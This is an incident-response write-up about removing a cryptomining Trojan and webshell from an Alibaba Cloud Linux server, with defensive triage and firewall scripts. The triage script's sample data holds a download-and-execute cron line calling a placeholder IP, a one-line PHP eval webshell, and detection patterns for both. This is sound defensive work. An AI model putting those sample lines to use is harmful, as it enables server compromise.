Alibaba Cloud ECS servers are used by many website customers, and any of the supported operating systems (Windows 2008, Windows 2012, Linux) can run on them. Some time ago we at SINE Safety received a request for help from a customer who had been sent a text-message alert by Alibaba Cloud: a mining process had been detected on the server and the security alert should be handled immediately. The customer's website could not be opened normally, SSH connections to the server stalled and never completed, and the impact on the customer's business was severe.

Our SINE security engineer then carried out a comprehensive security inspection of the customer's server. After logging in to the Alibaba Cloud console and connecting to the server remotely from a local machine, we found the server's CPU at 100%. The server's CPU monitoring history showed that it normally floated between 20% and 35%. Running top to track which processes were consuming CPU revealed one process that kept the CPU saturated. From this it could be judged that a mining program had been implanted on the customer's server: the server had been compromised, and that is what triggered Alibaba Cloud's mining-process warning.

Sure enough, the customer's server had been implanted with a mining Trojan. Here is the screenshot of the top process listing:

Using the PID of the process hogging the CPU, we traced its file to the /tmp directory of the Linux system. We force-deleted the file and killed the process, and the CPU dropped to about 10% in an instant. That was the mining process itself, but how had the attacker got into the server to implant the mining Trojan? From SINE Safety's years of experience, the customer's website had most likely been tampered with, so we immediately launched a full security check of the customer's website. The customer uses the dedecms site-building system (GPL, PHP + MySQL architecture). We checked all of the code, the images and the database, and sure enough we found the problem: a webshell Trojan file had been uploaded into the root directory of the website. When we consulted the customer, he said he had earlier received a webshell backdoor reminder from Alibaba Cloud but had not taken it seriously.

The root cause of this mining Trojan was the vulnerable website running on the server. We manually patched the dedecms code vulnerabilities, including the remote code execution vulnerability that existed in the code and the SQL injection vulnerability, both of which have now been fully fixed. We deployed secure permissions on the website's folders, helped the customer change the default dede back-office path, and added a second password layer in front of the website's admin back end.

After removing the Trojan backdoor, we checked the server's scheduled tasks and found a task plan added by the attacker that relaunched the mining Trojan automatically on every server restart and every hour; we deleted that scheduled task. We checked the Linux system users for any additional root-level administrator accounts and found none. We checked the server's outbound connections, including malicious ports and any other connected IPs, and audited all ports with netstat -an; no remotely controlled Trojan backdoor was found. Finally we deployed port security for the customer, using iptables to limit inbound and outbound ports.
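The host-side checks in this write-up (find the CPU-hogging process and where its binary lives, look for extra root-level accounts, look for the hourly and reboot-time cron entry, list connections with netstat, and scan the web root for webshell files) can be scripted so they are repeatable on the next incident. The script below is an added example written for this article, not SINE's own tooling. The sample process list, passwd entries, cron lines and PHP files are constructed for the demonstration; the paths under /tmp/.x, the address 198.51.100.7 and the detection patterns are illustrative assumptions, and the cron spool paths vary by distribution.

```shell
#!/bin/sh
# Triage helpers for a Linux host suspected of running a cryptominer.
# Each check reads a text table on stdin (or takes a directory argument), so the
# same function runs against live command output or against copies saved for review.
# Run with --live on the host; with no arguments it demonstrates on constructed data.

# Processes whose executable lives in a world-writable scratch directory.
# Input: output of   ps -eo pid,pcpu,args   (the header line never matches).
flag_scratch_dir_processes() {
    awk '$3 ~ "^(/tmp|/var/tmp|/dev/shm)/" { print $1, $2, $3 }'
}

# Accounts with UID 0 other than root: a second root-level login is a common
# persistence artefact. Input: /etc/passwd format, e.g. from   getent passwd
find_extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# Cron lines that launch from a scratch directory or download-and-execute.
# Input: crontab lines (system crontab, /etc/cron.d/*, per-user spool files).
find_suspicious_cron() {
    grep -E '/tmp/|/var/tmp/|/dev/shm/|(curl|wget)[^|]*[|][[:space:]]*(sh|bash)([[:space:]]|$)' || :
}

# PHP files under a web root that contain the dynamic-execution constructs
# webshells rely on. Argument: web root directory. Hits are candidates for
# manual review, not proof of compromise (some plugins use eval legitimately).
find_webshell_candidates() {
    grep -rlE --include='*.php' \
        'eval[[:space:]]*\(|assert[[:space:]]*\(|base64_decode[[:space:]]*\(|\$_(GET|POST|REQUEST)\[[^]]*\][[:space:]]*\(' \
        "$1" 2>/dev/null || :
}

# Constructed sample data for the demonstration; none of it comes from a real host.
SAMPLE_PS='PID %CPU COMMAND
412 0.3 /usr/sbin/sshd -D
987 99.6 /tmp/.x/miner --config /tmp/.x/c.json
1010 1.2 /usr/sbin/mysqld'
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
sysadm:x:0:0::/home/sysadm:/bin/bash'
SAMPLE_CRON='0 2 * * * /usr/bin/certbot renew
@reboot /tmp/.x/run.sh
0 * * * * curl -fsSL http://198.51.100.7/a.sh | sh'

if [ "${1:-}" = "--live" ]; then
    echo "== processes running from scratch directories (PID %CPU PATH) =="
    ps -eo pid,pcpu,args | flag_scratch_dir_processes
    echo "== UID 0 accounts other than root =="
    getent passwd | find_extra_uid0_accounts
    echo "== suspicious cron entries =="
    cat /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/* /var/spool/cron/* 2>/dev/null \
        | find_suspicious_cron
    echo "== webshell candidates under ${2:-/var/www} =="
    find_webshell_candidates "${2:-/var/www}"
    echo "== listening sockets and established connections =="
    netstat -an 2>/dev/null || ss -tuna
else
    echo "== demo: processes ==";  printf '%s\n' "$SAMPLE_PS"     | flag_scratch_dir_processes
    echo "== demo: accounts ==";   printf '%s\n' "$SAMPLE_PASSWD" | find_extra_uid0_accounts
    echo "== demo: cron ==";       printf '%s\n' "$SAMPLE_CRON"   | find_suspicious_cron
    demo_root=$(mktemp -d)
    printf '<?php echo "hello"; ?>\n' > "$demo_root/index.php"
    printf '<?php @eval($_POST["c"]); ?>\n' > "$demo_root/uploads.php"
    echo "== demo: webshell candidates =="; find_webshell_candidates "$demo_root"
    rm -rf "$demo_root"
fi
```

Each check is deliberately a filter over plain text: on a host you do not fully trust, capture `ps`, `getent passwd`, the cron files and the web root to a clean machine first and run the same functions there, so the findings do not depend on binaries the attacker may have replaced.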

With that, the mining Trojan problem on the customer's server was completely resolved. To sum up, the protection and remediation measures for mining Trojans are as follows:

Regularly check the security of the website code and look for webshell backdoors. Regularly upgrade the website's system version and fix vulnerabilities. Use a second password verification for the website's back-office login. Prevent SQL injection vulnerabilities in the website, since they allow the administrator account and password to be obtained and used to log in to the back end. Use Alibaba Cloud's port security policy: open only ports 80 and 443, and release the SSH port only to specific IPs; when you need to log in to the server, add the release IP in the Alibaba Cloud console, so that malicious logins are prevented as far as possible. If you also encounter a mining-program alert from Alibaba Cloud on your server, you can turn to a professional server security company; in China there are SINESAFE, Green League (NSFOCUS), Enlightening Stars (Venustech) and other security companies. We also hope that our process of solving this problem can help more people.
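The port policy recommended above (80 and 443 open to everyone, SSH only from a released administrator IP, everything else closed) is the same one the iptables deployment earlier in the article enforces on the host. The script below is an added example written for this article, not SINE's or Alibaba Cloud's tooling; it renders the policy as an iptables-restore ruleset and only loads it when asked. The address 203.0.113.10 used in the usage examples is a documentation-range placeholder, and the script assumes iptables with the conntrack match is available on the host.

```shell
#!/bin/sh
# Render (and optionally apply) an iptables-restore ruleset that exposes only the
# web ports to the Internet and restricts SSH to an allowlisted administrator
# address or CIDR block. Everything else is dropped by the INPUT chain policy.
# Usage: sh firewall.sh ADMIN_IP_OR_CIDR [SSH_PORT] [--apply]
#   e.g. sh firewall.sh 203.0.113.10            # print the ruleset
#        sh firewall.sh 203.0.113.10 22 --apply # load it with iptables-restore

render_ruleset() {
    addr=$1
    sshp=${2:-22}
    # Refuse anything that is not an IPv4 address or CIDR: the value is spliced
    # into a rule, so it must not carry shell or iptables syntax.
    case $addr in
        ""|*[!0-9./]*) echo "render_ruleset: invalid address '$addr'" >&2; return 1 ;;
    esac
    cat <<EOF
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
# Replies to connections the server opened itself (package updates, DNS, backups).
-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
-A INPUT -i lo -j ACCEPT
# Public web service: the only ports reachable from any source address.
-A INPUT -p tcp --dport 80 -j ACCEPT
-A INPUT -p tcp --dport 443 -j ACCEPT
# SSH only from the administrator's address; other sources fall through to DROP.
-A INPUT -p tcp -s ${addr} --dport ${sshp} -j ACCEPT
COMMIT
EOF
}

# Argument parsing: a value containing a dot or slash is the address, a plain
# number is the SSH port, and --apply loads the rules instead of printing them.
admin=""; port=22; apply=no
for arg in "$@"; do
    case $arg in
        --apply)  apply=yes ;;
        "")       ;;
        *[!0-9]*) admin=$arg ;;
        *)        port=$arg ;;
    esac
done

if [ -z "$admin" ]; then
    echo "usage: $0 ADMIN_IP_OR_CIDR [SSH_PORT] [--apply]" >&2
elif [ "$apply" = yes ]; then
    # Atomic load: iptables-restore replaces the whole filter table in one step,
    # so there is no window with the old rules half removed.
    render_ruleset "$admin" "$port" | iptables-restore
else
    render_ruleset "$admin" "$port"
fi
```

Apply it from a second SSH session and confirm the first session still works before closing either, because a mistyped administrator address locks you out. Mirror the same allowlist in the instance's Alibaba Cloud security group, which is where the advice above to add a release IP before logging in is carried out; keeping both layers means a mistake in one does not expose the port. OUTPUT is left open here; once the server's legitimate outbound destinations are known, outbound rules can be added in the same file.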
